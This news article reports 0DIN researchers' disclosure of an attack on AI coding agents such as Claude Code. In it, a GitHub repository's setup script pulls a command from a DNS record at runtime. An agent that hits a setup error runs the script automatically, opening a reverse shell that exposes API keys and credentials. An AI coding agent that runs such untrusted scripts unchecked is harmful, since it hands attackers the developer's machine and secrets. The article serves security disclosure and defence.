Software

Claude Code Executes Hidden Malware in GitHub Repos Without Verification

Security researchers found attackers can compromise developers' machines by embedding malware in GitHub repos, bypassing AI tools like Claude Code.

Abstract illustration of AI with silhouette head full of eyes, symbolizing observation and technology.

Photo: Tara Winstead / Pexels

Security researchers at 0DIN, Mozilla's GenAI bug bounty platform, discovered a new attack vector that exploits AI coding tools. Attackers can gain full control of a developer's machine by embedding malicious code in a GitHub repository. The malware is hidden and not directly visible in the repository, making it difficult to detect through standard scanning methods or code reviews.

The attack works by using a setup script in the repo that pulls a command from a DNS entry at runtime and executes it. The malicious code is not present in the repository itself, which allows it to evade detection by scanners and AI agents. When a user runs an AI coding tool like Claude Code on the repository, the tool hits a routine error message during setup, automatically runs the script, and opens a reverse shell to the attacker. This gives the attacker access to sensitive information such as API keys and login credentials, enabling persistent access to the target system.

The researchers emphasized that the attack can be triggered by a single repository link in a job posting, tutorial, or Slack message. They recommended that AI agents should display the contents of setup scripts before executing them, and developers should treat setup instructions from third-party repos as untrusted code.

Source: thedecoder

Key points

Security researchers at 0DIN found attackers can compromise developers' machines by embedding malware in GitHub repos.
Attackers can gain full control of a developer's machine by embedding malicious code in a GitHub repository.
The malicious code is hidden and not directly visible in the repository, making it difficult to detect through standard scanning methods or code reviews.
The attack works by using a setup script in the repo that pulls a command from a DNS entry at runtime and executes it.
When a user runs an AI coding tool like Claude Code on the repository, the tool hits a routine error message during setup, automatically runs the script, and opens a reverse shell to the attacker.
The researchers emphasized that the attack can be triggered by a single repository link in a job posting, tutorial, or Slack message.
They recommended that AI agents should display the contents of setup scripts before executing them, and developers should treat setup instructions from third-party repos as untrusted code.

Source: The Decoder Read the original →

WRITTEN BY

Theo Almeida

AI Software & Developer Tools

Theo covers AI software, developer tools, frameworks, and the platforms builders use every day.

Claude Code Executes Hidden Malware in GitHub Repos Without Verification

Key points

Related articles

Flexion Robotics Develops AI for Autonomous Humanoid Tasks

AMD Introduces Workload Pre-Emption in Resource Manager

Stripe Uses AI Agents to Improve Financial Compliance

Cara Uses AWS to Power Domain-Specific AI for Insurance